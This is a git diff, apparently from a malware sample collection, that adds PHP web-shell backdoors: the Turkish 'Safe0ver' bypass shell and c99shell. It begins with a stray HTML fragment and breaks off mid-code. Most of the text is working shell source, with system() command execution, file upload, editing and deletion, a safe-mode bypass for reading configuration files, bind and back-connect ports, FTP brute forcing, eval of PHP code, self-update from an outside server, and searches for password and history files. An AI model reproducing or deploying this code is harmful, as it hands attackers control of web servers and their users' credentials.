    Ayyildiz TIM | AYT | TUM HAKLARI SAKLIDIR.

    +

    +
    + + + + + + +
    +
    + + + + + + + + + +END; + +} + +function html_footer () { + + echo << + +END; + +} + +function notice ($phrase) { + global $cols; + + $args = func_get_args(); + array_shift($args); + + return ' + ' . phrase($phrase, $args) . ' + +'; + +} + +function error ($phrase) { + global $cols; + + $args = func_get_args(); + array_shift($args); + + return ' + ' . phrase($phrase, $args) . ' + +'; + +} + +?> + +
    SU AN iMHaBiRLiGi HUDUTLARINDA BULUNMAKTASINIZ.!!
    + + + diff --git a/PHP/Backdoor.PHP.ByPass.a b/PHP/Backdoor.PHP.ByPass.a new file mode 100644 index 00000000..f33fd906 --- /dev/null +++ b/PHP/Backdoor.PHP.ByPass.a @@ -0,0 +1,922 @@ +=4); +$scriptTitle = "Safe0ver"; +$scriptident = ""."$scriptTitle By TDT - www.WWW.php-shell.org"; + +$urlAdd = ""; +$formAdd = ""; + +function walkArray($array){ + while (list($key, $data) = each($array)) + if (is_array($data)) { walkArray($data); } + else { global $$key; $$key = $data; global $urlAdd; $urlAdd .= "$key=".urlencode($data)."&";} +} + +if (isset($_PUT)) walkArray($_PUT); +if (isset($_GET)) walkArray($_GET); +if (isset($_POST)) walkArray($_POST); + + +$pos = strpos($urlAdd, "s=r"); +if (strval($pos) != "") { +$urlAdd= substr($urlAdd, 0, $pos); +} + +$urlAdd .= "&s=r&"; + +if (empty($Pmax)) + $Pmax = 125; +if (empty($Pidx)) + $Pidx = 0; + +$dir = str_replace("\\", "/", str_replace("//", "/", str_replace("\\\\", "\\", $dir ))); +$file = str_replace("\\", "/", str_replace("//", "/", str_replace("\\\\", "\\", $file ))); + +$scriptdate = "7 Subat 2007"; +$scriptver = "TDT Version"; +$LOCAL_IMAGE_DIR = "img"; +$REMOTE_IMAGE_URL = "img"; +$img = array( + "Edit" => "edit.gif", + "Download" => "download.gif", + "Upload" => "upload.gif", + "Delete" => "delete.gif", + "View" => "view.gif", + "Rename" => "rename.gif", + "Move" => "move.gif", + "Copy" => "copy.gif", + "Execute" => "exec.gif" + ); + +while (list($id, $im)=each($img)) + if (file_exists("$LOCAL_IMAGE_DIR/$im")) + $img[$id] = "\"$id\""; + else + $img[$id] = "[$id]"; + + + + + + + if ( ( (isset($http_auth_user) ) && (isset($http_auth_pass)) ) && ( !isset($PHP_AUTH_USER) || $PHP_AUTH_USER != $http_auth_user || $PHP_AUTH_PW != $http_auth_pass) || (($logoff==1) && $noauth=="yes") ) { + setcookie("noauth",""); + Header( "WWW-authenticate: Basic realm=\"$scriptTitle $scriptver\""); + Header( "HTTP/1.0 401 Unauthorized"); + echo "Your username or password is incorrect"; + exit ; + + } + +function buildUrl($display, $url) { + global $urlAdd; + $url = $SFileName . "?$urlAdd$url"; + return "$display"; +} + +function sp($mp) { + for ( $i = 0; $i < $mp; $i++ ) + $ret .= " "; + return $ret; +} + +function spacetonbsp($instr) { return str_replace(" ", " ", $instr); } + +function Mydeldir($Fdir) { + if (is_dir($Fdir)) { + $Fh=@opendir($Fdir); + while ($Fbuf = readdir($Fh)) + if (($Fbuf != ".") && ($Fbuf != "..")) + Mydeldir("$Fdir/$Fbuf"); + @closedir($Fh); + return rmdir($Fdir); + } else { + return unlink($Fdir); + } +} + + +function arrval ($array) { +list($key, $data) = $array; +return $data; +} + +function formatsize($insize) { + $size = $insize; + $add = "B"; + if ($size > 1024) { + $size = intval(intval($size) / 1.024)/1000; + $add = "KB"; + } + if ($size > 1024) { + $size = intval(intval($size) / 1.024)/1000; + $add = "MB"; + } + if ($size > 1024) { + $size = intval(intval($size) / 1.024)/1000; + $add = "GB"; + } + if ($size > 1024) { + $size = intval(intval($size) / 1.024)/1000; + $add = "TB"; + } + return "$size $add"; +} + +if ($cmd != "downl") { + ?> + + + + + + <?php echo $SFileName ?> + + +
    + + + + +
    + - - +
    + + + + +

    + + ".sp(3)."\n\n\n\n + Klas?r Listelenemiyor!L?tfen Bypass B?l?m?n? Deneyin.
    ".sp(3)."\n + Script Gecisi Tamamlayamadi! +

    ".sp(3)."\n + Klas?re Girmek Icin yetkiniz Olduguna emin Olunuz... +

    \n\n\n\n"; + } + if (function_exists('realpath')) { + $partdir = realpath($dir); + } + else { + $partdir = $dir; + } + if (strlen($partdir) >= 100) { + $partdir = substr($partdir, -100); + $pos = strpos($partdir, "/"); + if (strval($pos) != "") { + $partdir = "<-- ...".substr($partdir, $pos); + } + $partdir = str_replace("\\", "/", str_replace("//", "/", str_replace("\\\\", "\\", $partdir ))); + $dir = str_replace("\\", "/", str_replace("//", "/", str_replace("\\\\", "\\", $dir ))); + $file = str_replace("\\", "/", str_replace("//", "/", str_replace("\\\\", "\\", $file ))); + } + ?> +
    " method="POST"> + + + + +
    +
     Safe0ver-Server File Browser... 
    +
    +
    + + + + + +
    +  Listeliyor:  + + + + + + +
     GiT 
    + +
    + + + + + + + + + + $Pmax ) { + $from = $Pidx * $Pmax; + $to = ($Pidx + 1) * $Pmax-1; + if ($to - count($filelist) - 1 + ($Pmax / 2) > 0 ) + $to = count($filelist) - 1; + if ($to > count($filelist)-1) + $to = count($filelist)-1; + $Dcontents = array(); + For ($Fi = $from; $Fi <= $to; $Fi++) { + $Dcontents[] = $filelist[$Fi]; + } + + } + else { + $Dcontents = $filelist; + } + + $tdcolors = array("lighttd", "darktd"); + + while (list ($key, $file) = each ($Dcontents)) { + if (!$tdcolor=arrval(each($tdcolors))) { + reset($tdcolors); + $tdcolor = arrval(each($tdcolors)); } + + if (is_dir("$dir/$file")) { + + echo "\n"; + + echo "\n"; + + echo "\n"; + + echo "\n"; + + echo ""; + echo "\n"; + + } + else { + + if ( @is_readable("$dir/$file") ) + echo "\n"; + else + echo "\n"; + + echo "\n"; + + echo "\n"; + + + echo "\n"; + + echo ""; + echo "\n"; + } + } + + echo "
    +  Dosya Adi  + +  Yapilabilecekler   + +  Boyut  + +  Yetkiler  + +  Son D?zenleme  +
    ".sp(3).buildUrl( "[$file]", "cmd=dir&dir=$dir/$file") .sp(9)."
    ".sp(2)."\n"; + + if ( ($file != ".") && ($file != "..") ) + echo buildUrl($img["Rename"], "cmd=ren&lastcmd=dir&lastdir=$dir&oldfile=$dir/$file").sp(3)."\n"; + + if ( ($file != ".") && ($file != "..") ) + echo sp(3).buildUrl( $img["Delete"], "cmd=deldir&file=$dir/$file&lastcmd=dir&lastdir=$dir")."\n"; + + echo "  
       \n"; + echo "D"; + if ( @is_readable("$dir/$file") ) { + echo "R"; + } + if (function_exists('is_writeable')) { + if ( @is_writeable("$dir/$file") ) { + echo "W"; + } + } + else { + echo "(W)"; + } + if ( @is_executable("$dir/$file") ) { + echo "X"; + } + echo "  \n"; + echo "  ".date("D d-m-Y H:i:s", filemtime("$dir/$file"))."  "; + echo "
    ".sp(3).buildUrl( $file, "cmd=file&file=$dir/$file").sp(9)."
    ".sp(3).$file.sp(9)."
      \n"; + + echo buildUrl($img["Rename"], "cmd=ren&lastcmd=dir&lastdir=$dir&oldfile=$dir/$file").sp(3)."\n"; + + if ( (@is_writeable("$dir/$file")) && (@is_readable("$dir/$file")) ) + echo buildUrl( $img["Edit"], "cmd=edit&file=$dir/$file").sp(3)."\n"; + + echo buildUrl( $img["Copy"], "cmd=copy&file=$dir/$file")."\n"; + + if ( (@is_writeable("$dir/$file")) && (@is_readable("$dir/$file")) ) + echo sp(3). buildUrl( $img["Move"], "cmd=move&file=$dir/$file")."\n"; + + echo sp(3). buildUrl( $img["Delete"], "cmd=delfile&file=$dir/$file&lastcmd=dir&lastdir=$dir")."\n"; + + echo sp(3). buildUrl( $img["Download"], "cmd=downl&file=$dir/$file")."\n"; + + if ( @is_executable("$dir/$file") ) + echo sp(3).buildUrl( $img["Execute"], "cmd=execute&file=$dir/$file")."\n"; + + echo sp(2)."
    \n"; + $size = @filesize("$dir/$file"); + If ($size != false) { + $filesizes += $size; + echo "  ".formatsize($size).""; + } + else + echo "  0 B"; + echo "    \n"; + + if ( @is_readable("$dir/$file") ) + echo "R"; + if ( @is_writeable("$dir/$file") ) + echo "W"; + if ( @is_executable("$dir/$file") ) + echo "X"; + if (function_exists('is_uploaded_file')){ + if ( @is_uploaded_file("$dir/$file") ) + echo "U"; + } + else { + echo "(U)"; + } + echo "  \n"; + echo "  ".date("D d-m-Y H:i:s", filemtime("$dir/$file"))."  "; + echo "
    \n\n"; + + function printpagelink($a, $b, $link = ""){ + if ($link != "") + echo "| $a - $b |"; + else + echo "| $a - $b |"; + } + + if ( count($filelist)-1 > $Pmax ) { + echo ""; + } + + + echo "
    \n"; + echo "  ".@count ($dirn)." Klas?r, ".@count ($filen)." Dosya  \n"; + echo "\n"; + echo "  Toplam Dosya Boyutu: ".formatsize($filesizes)."  
    Page:
    "; + $Fi = 0; + while ( ( (($Fi+1)*$Pmax) + ($Pmax/2) ) < count($filelist)-1 ) { + $from = $Fi*$Pmax; + while (($filelist[$from]==".") || ($filelist[$from]=="..")) $from++; + $to = ($Fi + 1) * $Pmax - 1; + if ($Fi == $Pidx) + $link=""; + else + $link="$SFilename?$urlAdd"."cmd=$cmd&dir=$dir&Pidx=$Fi"; + printpagelink (substr(strtolower($filelist[$from]), 0, 5), substr(strtolower($filelist[$to]), 0, 5), $link); + echo "   "; + $Fi++; + } + $from = $Fi*$Pmax; + while (($filelist[$from]==".") || ($filelist[$from]=="..")) $from++; + $to = count($filelist)-1; + if ($Fi == $Pidx) + $link=""; + else + $link="$SFilename?$urlAdd"."cmd=$cmd&dir=$dir&Pidx=$Fi"; + printpagelink (substr(strtolower($filelist[$from]), 0, 5), substr(strtolower($filelist[$to]), 0, 5), $link); + + + echo "
    \n
    "; + + if ($isGoodver) { + echo "\n"; + } + else { + echo "\n"; + } + + echo "\n"; + echo "\n"; + echo "\n"; + echo "\n"; + echo "\n"; + echo ""; + echo "
     PHP Versiyonu:    $PHPVer 
     Server's PHP Version:    $PHPVer (Some functions might be unavailable...) 
     Diger Islemler:    ".buildUrl( "| Yeni Dosya |", "cmd=newfile&lastcmd=dir&lastdir=$dir")."\n".sp(3). + buildUrl( "| Yeni Klas?r |", "cmd=newdir&lastcmd=dir&lastdir=$dir")."\n".sp(3). + buildUrl( "| Dosya Y?kle |", "cmd=upload&dir=$dir&lastcmd=dir&lastdir=$dir"). "\n
     Script Location:    $PATH_TRANSLATED
     IP Adresin:    $REMOTE_ADDR 
     Bulundugun Klas?r:   $partdir 
     Semboller:  \n"; + echo ""; + echo "\n"; + echo "\n"; + echo "\n"; + echo "\n"; + echo "\n"; + echo "
    D:  Klas?r.
    R:  Okunabilir.
    W:  Yazilabilir.
    X:  Komut Calistirilabilir.
    U:  HTTP Uploaded File.
    "; + echo "
    "; + @closedir($h); + } + elseif ( $cmd=="execute" ) { + echo system("$file"); + } +elseif ( $cmd=="deldir" ) { + echo "
    "; +} + elseif ( $cmd=="delfile" ) { echo "
    " ; + if ($auth == "yes") { + if (Mydeldir($file)==false) { + echo "Could not remove \"$file\"
    Permission denied, or directory not empty..."; + } + else { + echo "Successfully removed \"$file\"
    "; + } + echo ""; + } + else { + echo "Are you sure you want to delete \"$file\" and all it's subdirectories ? +
    + + + + + +
    +
    + + +
    "; + } + echo "
    "; +} +elseif ( $cmd=="newfile" ) { + echo "
    " ; + if ($auth == "yes") { + if (@unlink($file)==false) { + echo "Could not remove \"$file\"
    "; + } + else { + echo "Successfully removed \"$file\"
    "; + } + echo "
    "; + } + else { + echo "Are you sure you want to delete \"$file\" ? +
    + + + + + + +
    +
    + + +
    "; + } + echo "
    "; + $i = 1; + while (file_exists("$lastdir/newfile$i.txt")) + $i++; + $file = fopen("$lastdir/newfile$i.txt", "w+"); + if ($file == false) + echo "Could not create the new file...
    "; + else + echo "Successfully created: \"$lastdir/newfile$i.txt\"
    "; + echo " +
    + + + +
    +
    "; + } +elseif ( $cmd=="newdir" ) { + echo "
    " ; + $i = 1; + while (is_dir("$lastdir/newdir$i")) + $i++; + $file = mkdir("$lastdir/newdir$i", 0777); + if ($file == false) + echo "Could not create the new directory...
    "; + else + echo "Successfully created: \"$lastdir/newdir$i\"
    "; + echo "
    + + + +
    "; +} +elseif ( $cmd=="edit" ) { + $contents = ""; + $fc = @file( $file ); + while ( @list( $ln, $line ) = each( $fc ) ) { + $contents .= htmlentities( $line ) ; + } + echo "
    "; + echo "M
    \n"; + echo "\n"; + echo "EDIT FILE: $file
    \n"; + echo "
    \n"; + echo "\n"; + echo ""; + echo "
    "; + echo "
    "; +} +elseif ( $cmd=="saveedit" ) { + $fo = fopen($file, "w"); + $wrret = fwrite($fo, stripslashes($contents)); + $clret = fclose($fo); +} +elseif ( $cmd=="downl" ) { + $downloadfile = urldecode($file); + if (function_exists("basename")) + $downloadto = basename ($downloadfile); + else + $downloadto = "download.ext"; + if (!file_exists("$downloadfile")) + echo "The file does not exist"; + else { + $size = @filesize("$downloadfile"); + if ($size != false) { + $add="; size=$size"; + } + else { + $add=""; + } + header("Content-Type: application/download"); + header("Content-Disposition: attachment; filename=$downloadto$add"); + $fp=fopen("$downloadfile" ,"rb"); + fpassthru($fp); + flush(); + } +} +elseif ( $cmd=="upload" ) { + ?> +
    + + + + +
    + Dosya Y?kleme Sekmesine Tikladiniz ! +
    Eger Y?klemek istediginiz Dosya mevcut ise ?zerine Yazilir.

    +
    " method="post"> + + + + + + Dosya Y?kle:
    +
    + +
    +
    +
    " method="POST"> + + + +
    +
    +
    + +
    "; + if (file_exists($userfile)) + $res = copy($userfile, "$dir/$userfile_name"); + echo "Uploaded \"$userfile_name\" to \"$userfile\";
    \n"; + if ($res) { + echo "Basariyla Y?klendi \"$userfile\" to \"$dir/$userfile_name\".\n

    "; + echo "Y?klenen Dosya Adi: \"$userfile_name\".\n
    Dosya Adi: \"$userfile\".\n
    "; + echo "Dosya Boyutu: ".formatsize($userfile_size).".\n
    Filetype: $userfile_type.\n
    "; + } + else { + echo "Y?klenemedi..."; + } + echo "
    " ; + echo "

    "; +} +elseif ( $cmd=="file" ) { + echo "
    "; + $fc = @file( $file ); while ( @list( $ln, $line ) = each( $fc ) ) { + echo spacetonbsp(@htmlentities($line))."
    \n"; + } + echo "
    "; +} +elseif ( $cmd=="ren" ) { + if (function_exists('is_dir')) { + if (is_dir("$oldfile")) { + $objname = "Directory"; + $objident = "Directory"; + } + else { + $objname = "Filename"; + $objident = "file"; + } + } + echo "
     Rename a file: 

    \n"; + If (empty($newfile) != true) { + echo "
    "; + $return = @rename($oldfile, "$olddir$newfile"); + if ($return) { + echo "$objident renamed successfully:

    Old $objname: \"$oldfile\".
    New $objname: \"$olddir$newfile\""; + } + else { + if ( @file_exists("$olddir$newfile") ) { + echo "Error: The $objident does already exist...

    \"$olddir$newfile\"

    Hit your browser's back to try again..."; + } + else { + echo "Error: Can't copy the file, the file could be in use or you don't have permission to rename it."; + } + } + echo "
    " ; + } + else { + $dpos = strrpos($oldfile, "/"); + if (strval($dpos)!="") { + $olddir = substr($oldfile, 0, $dpos+1); + } + else { + $olddir = "$lastdir/"; + } + $fpos = strrpos($oldfile, "/"); + if (strval($fpos)!="") { + $inputfile = substr($oldfile, $fpos+1); + } + else { + $inputfile = ""; + } + echo "
    \n"; + echo "\n"; + echo "\n"; + echo "\n"; + echo "\n"; + echo "\n"; + echo "Rename \"$oldfile\" to:
    \n"; + echo "
    "; + echo "
    "; + echo "
    "; + } +} +else if ( $cmd == "con") { + +?> +
    + + +
     
    + + + + + +
    +
     -<[{ Main Menu }]>- 
    +
    +
    +
    + + + + + +
    + ##Safe0ver##", "cmd=dir&dir=.").sp(2); ?> Safe0ver Shell Piyasada Bulunan Bir Cok Shell'in Kodlarindan(c99,r57 vs...) Sentezlenerek Kodlanmistir.Entegre Olarak Bypass ?zelligi Eklenmis Ve B?ylece Tahrip G?c? Y?kseltilmistir.Yazilimimiz Hic bir Virus,worm,trojan gibi Kullaniciyi Tehdit Eden Veya S?m?ren yazilimlar Icermemektedir.

    --------------------------

    Bypass Kullan?m:Cat /home/evilc0der/public_html/config.php Gibi Olmalidir.
    +

    +


    Safe Mode ByPAss

    +

    " name="dizin"> +

    +
    +
    +

    +
    +------------------------------------------------------------------------------------

    +$safemodgec"; +} +?> + +

    +
    + + + + + + +
    +
    +   [ Main Menu ] ", "cmd=&dir="); ?>   +      +   [ R00T ] ", "cmd=dir&dir=."); ?>    +
    +
    +
    + + + + + +
    +
      - -  
    +
    +
    + + diff --git a/PHP/Backdoor.PHP.C99Shell.a b/PHP/Backdoor.PHP.C99Shell.a new file mode 100644 index 00000000..6bc61dfe --- /dev/null +++ b/PHP/Backdoor.PHP.C99Shell.a @@ -0,0 +1,3069 @@ +$v) {if (strtoupper($k) != "GLOBALS") {strips($arr["$k"]);}}} else {$arr = stripslashes($arr);}}} strips($GLOBALS);} +$_REQUEST = array_merge($_COOKIE,$_GET,$_POST); +foreach($_REQUEST as $k=>$v) {if (!isset($$k)) {$$k = $v;}} + +$shver = "1.0 pre-release build #16"; //Current version +//CONFIGURATION AND SETTINGS +if (!empty($unset_surl)) {setcookie("c99sh_surl"); $surl = "";} +elseif (!empty($set_surl)) {$surl = $set_surl; setcookie("c99sh_surl",$surl);} +else {$surl = $_REQUEST["c99sh_surl"]; //Set this cookie for manual SURL +} + +$surl_autofill_include = TRUE; //If TRUE then search variables with descriptors (URLs) and save it in SURL. + +if ($surl_autofill_include and !$_REQUEST["c99sh_surl"]) {$include = "&"; foreach (explode("&",getenv("QUERY_STRING")) as $v) {$v = explode("=",$v); $name = urldecode($v[0]); $value = urldecode($v[1]); foreach (array("http://","https://","ssl://","ftp://","\\\\") as $needle) {if (strpos($value,$needle) === 0) {$includestr .= urlencode($name)."=".urlencode($value)."&";}}} if ($_REQUEST["surl_autofill_include"]) {$includestr .= "surl_autofill_include=1&";}} +if (empty($surl)) +{ + $surl = "?".$includestr; //Self url +} +$surl = htmlspecialchars($surl); + +$timelimit = 0; //time limit of execution this script over server quote (seconds), 0 = unlimited. + +//Authentication +$login = ""; //login +//DON'T FORGOT ABOUT PASSWORD!!! +$pass = ""; //password +$md5_pass = ""; //md5-cryped pass. if null, md5($pass) + +$host_allow = array("*"); //array ("{mask}1","{mask}2",...), {mask} = IP or HOST e.g. array("192.168.0.*","127.0.0.1") +$login_txt = "Restricted area"; //http-auth message. +$accessdeniedmess = "c99shell v.".$shver.": access denied"; + +$gzipencode = TRUE; //Encode with gzip? + +$updatenow = FALSE; //If TRUE, update now (this variable will be FALSE) + +$c99sh_updateurl = "http://ccteam.ru/update/c99shell/"; //Update server +$c99sh_sourcesurl = "http://ccteam.ru/files/c99sh_sources/"; //Sources-server + +$filestealth = TRUE; //if TRUE, don't change modify- and access-time + +$donated_html = "
    Owned by Pablin77
    "; + /* If you publish free shell and you wish + add link to your site or any other information, + put here your html. */ +$donated_act = array(""); //array ("act1","act2,"...), if $act is in this array, display $donated_html. + +$curdir = "./"; //start folder +//$curdir = getenv("DOCUMENT_ROOT"); +$tmpdir = ""; //Folder for tempory files. If empty, auto-fill (/tmp or %WINDIR/temp) +$tmpdir_log = "./"; //Directory logs of long processes (e.g. brute, scan...) + +$log_email = "user@host.tld"; //Default e-mail for sending logs + +$sort_default = "0a"; //Default sorting, 0 - number of colomn, "a"scending or "d"escending +$sort_save = TRUE; //If TRUE then save sorting-position using cookies. + +// Registered file-types. +// array( +// "{action1}"=>array("ext1","ext2","ext3",...), +// "{action2}"=>array("ext4","ext5","ext6",...), +// ... +// ) +$ftypes = array( + "html"=>array("html","htm","shtml"), + "txt"=>array("txt","conf","bat","sh","js","bak","doc","log","sfc","cfg","htaccess"), + "exe"=>array("sh","install","bat","cmd"), + "ini"=>array("ini","inf"), + "code"=>array("php","phtml","php3","php4","inc","tcl","h","c","cpp","py","cgi","pl"), + "img"=>array("gif","png","jpeg","jfif","jpg","jpe","bmp","ico","tif","tiff","avi","mpg","mpeg"), + "sdb"=>array("sdb"), + "phpsess"=>array("sess"), + "download"=>array("exe","com","pif","src","lnk","zip","rar","gz","tar") +); + +// Registered executable file-types. +// array( +// string "command{i}"=>array("ext1","ext2","ext3",...), +// ... +// ) +// {command}: %f% = filename +$exeftypes = array( + getenv("PHPRC")." -q %f%" => array("php","php3","php4"), + "perl %f%" => array("pl","cgi") +); + +/* Highlighted files. + array( + i=>array({regexp},{type},{opentag},{closetag},{break}) + ... + ) + string {regexp} - regular exp. + int {type}: + 0 - files and folders (as default), + 1 - files only, 2 - folders only + string {opentag} - open html-tag, e.g. "" (default) + string {closetag} - close html-tag, e.g. "" (default) + bool {break} - if TRUE and found match then break +*/ +$regxp_highlight = array( + array(basename($_SERVER["PHP_SELF"]),1,"",""), // example + array("config.php",1) // example +); + +$safemode_diskettes = array("a"); // This variable for disabling diskett-errors. + // array (i=>{letter} ...); string {letter} - letter of a drive +//$safemode_diskettes = range("a","z"); +$hexdump_lines = 8; // lines in hex preview file +$hexdump_rows = 24; // 16, 24 or 32 bytes in one line + +$nixpwdperpage = 100; // Get first N lines from /etc/passwd + +$bindport_pass = "c99"; // default password for binding +$bindport_port = "31373"; // default port for binding +$bc_port = "31373"; // default port for back-connect +$datapipe_localport = "8081"; // default port for datapipe + +// Command-aliases +if (!$win) +{ + $cmdaliases = array( + array("-----------------------------------------------------------", "ls -la"), + array("find all suid files", "find / -type f -perm -04000 -ls"), + array("find suid files in current dir", "find . -type f -perm -04000 -ls"), + array("find all sgid files", "find / -type f -perm -02000 -ls"), + array("find sgid files in current dir", "find . -type f -perm -02000 -ls"), + array("find config.inc.php files", "find / -type f -name config.inc.php"), + array("find config* files", "find / -type f -name \"config*\""), + array("find config* files in current dir", "find . -type f -name \"config*\""), + array("find all writable folders and files", "find / -perm -2 -ls"), + array("find all writable folders and files in current dir", "find . -perm -2 -ls"), + array("find all service.pwd files", "find / -type f -name service.pwd"), + array("find service.pwd files in current dir", "find . -type f -name service.pwd"), + array("find all .htpasswd files", "find / -type f -name .htpasswd"), + array("find .htpasswd files in current dir", "find . -type f -name .htpasswd"), + array("find all .bash_history files", "find / -type f -name .bash_history"), + array("find .bash_history files in current dir", "find . -type f -name .bash_history"), + array("find all .fetchmailrc files", "find / -type f -name .fetchmailrc"), + array("find .fetchmailrc files in current dir", "find . -type f -name .fetchmailrc"), + array("list file attributes on a Linux second extended file system", "lsattr -va"), + array("show opened ports", "netstat -an | grep -i listen") + ); +} +else +{ + $cmdaliases = array( + array("-----------------------------------------------------------", "dir"), + array("show opened ports", "netstat -an") + ); +} + +$sess_cookie = "c99shvars"; // Cookie-variable name + +$usefsbuff = TRUE; //Buffer-function +$copy_unset = FALSE; //Remove copied files from buffer after pasting + +//Quick launch +$quicklaunch = array( + array("\"Home\"",$surl), + array("\"Back\"","#\" onclick=\"history.back(1)"), + array("\"Forward\"","#\" onclick=\"history.go(1)"), + array("\"UPDIR\"",$surl."act=ls&d=%upd&sort=%sort"), + array("\"Refresh\"",""), + array("\"Search\"",$surl."act=search&d=%d"), + array("\"Buffer\"",$surl."act=fsbuff&d=%d"), + array("Encoder",$surl."act=encoder&d=%d"), + array("Tools",$surl."act=tools&d=%d"), + array("Proc.",$surl."act=processes&d=%d"), + array("FTP brute",$surl."act=ftpquickbrute&d=%d"), + array("Sec.",$surl."act=security&d=%d"), + array("SQL",$surl."act=sql&d=%d"), + array("PHP-code",$surl."act=eval&d=%d"), + array("Update",$surl."act=update&d=%d"), + array("Feedback",$surl."act=feedback&d=%d"), + array("Self remove",$surl."act=selfremove"), + array("Logout","#\" onclick=\"if (confirm('Are you sure?')) window.close()") +); + +//Highlight-code colors +$highlight_background = "#c0c0c0"; +$highlight_bg = "#FFFFFF"; +$highlight_comment = "#6A6A6A"; +$highlight_default = "#0000BB"; +$highlight_html = "#1300FF"; +$highlight_keyword = "#007700"; +$highlight_string = "#000000"; + +@$f = $_REQUEST["f"]; +@extract($_REQUEST["c99shcook"]); + +//END CONFIGURATION + + +// \/ Next code isn't for editing \/ +@set_time_limit(0); +$tmp = array(); +foreach($host_allow as $k=>$v) {$tmp[] = str_replace("\\*",".*",preg_quote($v));} +$s = "!^(".implode("|",$tmp).")$!i"; +if (!preg_match($s,getenv("REMOTE_ADDR")) and !preg_match($s,gethostbyaddr(getenv("REMOTE_ADDR")))) {exit("c99shell: Access Denied - your host (".getenv("REMOTE_ADDR").") not allow");} +if (!empty($login)) +{ + if (empty($md5_pass)) {$md5_pass = md5($pass);} + if (($_SERVER["PHP_AUTH_USER"] != $login) or (md5($_SERVER["PHP_AUTH_PW"]) != $md5_pass)) + { + if (empty($login_txt)) {$login_txt = strip_tags(ereg_replace(" |
    "," ",$donated_html));} + header("WWW-Authenticate: Basic realm=\"c99shell ".$shver.": ".$login_txt."\""); + header("HTTP/1.0 401 Unauthorized"); + exit($accessdeniedmess); + } +} +if ($act != "img") +{ +$lastdir = realpath("."); +chdir($curdir); +if ($selfwrite or $updatenow) {@ob_clean(); c99sh_getupdate($selfwrite,1); exit;} +$sess_data = unserialize($_COOKIE["$sess_cookie"]); +if (!is_array($sess_data)) {$sess_data = array();} +if (!is_array($sess_data["copy"])) {$sess_data["copy"] = array();} +if (!is_array($sess_data["cut"])) {$sess_data["cut"] = array();} + +$disablefunc = @ini_get("disable_functions"); +if (!empty($disablefunc)) +{ + $disablefunc = str_replace(" ","",$disablefunc); + $disablefunc = explode(",",$disablefunc); +} + +if (!function_exists("c99_buff_prepare")) +{ +function c99_buff_prepare() +{ + global $sess_data; + global $act; + foreach($sess_data["copy"] as $k=>$v) {$sess_data["copy"][$k] = str_replace("\\",DIRECTORY_SEPARATOR,realpath($v));} + foreach($sess_data["cut"] as $k=>$v) {$sess_data["cut"][$k] = str_replace("\\",DIRECTORY_SEPARATOR,realpath($v));} + $sess_data["copy"] = array_unique($sess_data["copy"]); + $sess_data["cut"] = array_unique($sess_data["cut"]); + sort($sess_data["copy"]); + sort($sess_data["cut"]); + if ($act != "copy") {foreach($sess_data["cut"] as $k=>$v) {if ($sess_data["copy"][$k] == $v) {unset($sess_data["copy"][$k]); }}} + else {foreach($sess_data["copy"] as $k=>$v) {if ($sess_data["cut"][$k] == $v) {unset($sess_data["cut"][$k]);}}} +} +} +c99_buff_prepare(); +if (!function_exists("c99_sess_put")) +{ +function c99_sess_put($data) +{ + global $sess_cookie; + global $sess_data; + c99_buff_prepare(); + $sess_data = $data; + $data = serialize($data); + setcookie($sess_cookie,$data); +} +} +foreach (array("sort","sql_sort") as $v) +{ + if (!empty($_GET[$v])) {$$v = $_GET[$v];} + if (!empty($_POST[$v])) {$$v = $_POST[$v];} +} +if ($sort_save) +{ + if (!empty($sort)) {setcookie("sort",$sort);} + if (!empty($sql_sort)) {setcookie("sql_sort",$sql_sort);} +} +if (!function_exists("str2mini")) +{ +function str2mini($content,$len) +{ + if (strlen($content) > $len) + { + $len = ceil($len/2) - 2; + return substr($content, 0,$len)."...".substr($content,-$len); + } + else {return $content;} +} +} +if (!function_exists("view_size")) +{ +function view_size($size) +{ + if (!is_numeric($size)) {return FALSE;} + else + { + if ($size >= 1073741824) {$size = round($size/1073741824*100)/100 ." GB";} + elseif ($size >= 1048576) {$size = round($size/1048576*100)/100 ." MB";} + elseif ($size >= 1024) {$size = round($size/1024*100)/100 ." KB";} + else {$size = $size . " B";} + return $size; + } +} +} +if (!function_exists("fs_copy_dir")) +{ +function fs_copy_dir($d,$t) +{ + $d = str_replace("\\",DIRECTORY_SEPARATOR,$d); + if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;} + $h = opendir($d); + while (($o = readdir($h)) !== FALSE) + { + if (($o != ".") and ($o != "..")) + { + if (!is_dir($d.DIRECTORY_SEPARATOR.$o)) {$ret = copy($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);} + else {$ret = mkdir($t.DIRECTORY_SEPARATOR.$o); fs_copy_dir($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);} + if (!$ret) {return $ret;} + } + } + closedir($h); + return TRUE; +} +} +if (!function_exists("fs_copy_obj")) +{ +function fs_copy_obj($d,$t) +{ + $d = str_replace("\\",DIRECTORY_SEPARATOR,$d); + $t = str_replace("\\",DIRECTORY_SEPARATOR,$t); + if (!is_dir(dirname($t))) {mkdir(dirname($t));} + if (is_dir($d)) + { + if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;} + if (substr($t,-1) != DIRECTORY_SEPARATOR) {$t .= DIRECTORY_SEPARATOR;} + return fs_copy_dir($d,$t); + } + elseif (is_file($d)) {return copy($d,$t);} + else {return FALSE;} +} +} +if (!function_exists("fs_move_dir")) +{ +function fs_move_dir($d,$t) +{ + $h = opendir($d); + if (!is_dir($t)) {mkdir($t);} + while (($o = readdir($h)) !== FALSE) + { + if (($o != ".") and ($o != "..")) + { + $ret = TRUE; + if (!is_dir($d.DIRECTORY_SEPARATOR.$o)) {$ret = copy($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o);} + else {if (mkdir($t.DIRECTORY_SEPARATOR.$o) and fs_copy_dir($d.DIRECTORY_SEPARATOR.$o,$t.DIRECTORY_SEPARATOR.$o)) {$ret = FALSE;}} + if (!$ret) {return $ret;} + } + } + closedir($h); + return TRUE; +} +} +if (!function_exists("fs_move_obj")) +{ +function fs_move_obj($d,$t) +{ + $d = str_replace("\\",DIRECTORY_SEPARATOR,$d); + $t = str_replace("\\",DIRECTORY_SEPARATOR,$t); + if (is_dir($d)) + { + if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;} + if (substr($t,-1) != DIRECTORY_SEPARATOR) {$t .= DIRECTORY_SEPARATOR;} + return fs_move_dir($d,$t); + } + elseif 